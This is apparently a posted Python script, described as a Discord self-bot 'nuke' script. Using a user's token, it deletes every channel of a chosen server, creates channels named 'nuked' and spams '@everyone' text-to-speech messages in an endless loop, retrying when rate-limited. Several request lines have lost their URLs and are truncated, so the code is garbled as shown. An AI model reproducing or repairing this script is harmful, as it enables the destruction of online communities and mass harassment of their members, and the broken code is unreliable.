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Created February 18, 2023 22:36
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Discord user (self-bot) nuke script.
# user nuke bot, not tested with bot tokens
# put your discord token in a file called token.txt
import requests, threading
channel_name = 'nuked' # set this to the text you want the channel to be named
channel_text = '@everyone' # set this to the text you want to say in the channel
tts = True # text to speech?
amount_of_channels = 1 # amount of channels you want to nuke with
delete_all_channels = True # deletes channels of the server
token = open('token.txt', 'r').read()
guild_id = 0 # set this to the guild id of the server you wanna nuke
headers = { 'accept':'*/*', 'content-type':'application/json', 'accept-encoding':'gzip', 'accept-language':'en-US', 'authorization':token, 'dnt':'1', 'referer':'', 'user-agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36 Edg/110.0.1587.41', 'x-debug-options':'bugReporterEnabled', 'x-discord-locale':'en-US' }
def spam():
r ='{guild_id}/channels', headers=headers, json={'type': 0, 'name': channel_name})
if r.status_code == 429:
spam() # retry on ratelimit
id = r.json()['id']
if tts:
requests.put(f'{id}/permissions/{guild_id}', headers=headers,json={id: str(guild_id), 'type': 0, 'allow': '4096', 'deny': '0'})
while True:'{id}/messages', headers=headers,json={'content': channel_text,'tts': tts, 'flags': 0})
if delete_all_channels:
for channel in requests.get(f'{guild_id}/channels', headers=headers).json():
requests.delete(''+channel['id'], headers=headers)
print("Deleted all channels!")
threads = []
for item in range(0, amount_of_channels):
thread = threading.Thread(target=spam)
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